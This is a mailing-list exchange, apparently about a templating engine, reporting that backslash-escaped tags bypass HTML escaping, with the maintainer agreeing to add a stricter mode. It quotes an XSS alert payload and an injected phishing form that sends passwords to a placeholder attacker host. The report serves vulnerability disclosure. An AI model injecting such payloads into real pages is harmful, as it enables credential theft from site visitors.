> Well, I have one major concern: If I'm using $escmode = 3 (which is
> pretty standard and secure at a first look) HTML tags are properly
> escaped. But there is a backdoor: \<. This makes XSS hacks possible
> again and your web site very insecure. Eg. enter in a input field the
> following data which is typically display later in a HTML output page:
>
> \<script\>alert('hi, this should never occur')\<script\>
>
> or not so innocent:
>
> \<form action=http://mybadhost/cgi-bin/getpasswd\>\<input type=password\>
> Please enter your password for a double check<\form\>
>
> So what I'm suggesting, Gerald, is just a new escape mode which just
> never allows backslash escaping tags.
>
Yes, such an escmode is highly neccessary
> Or am I just telling old stories here?
>
I already thought about this problem, but didn't had the time to think it to
the end...
I will add it as soon as possible
Gerald
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
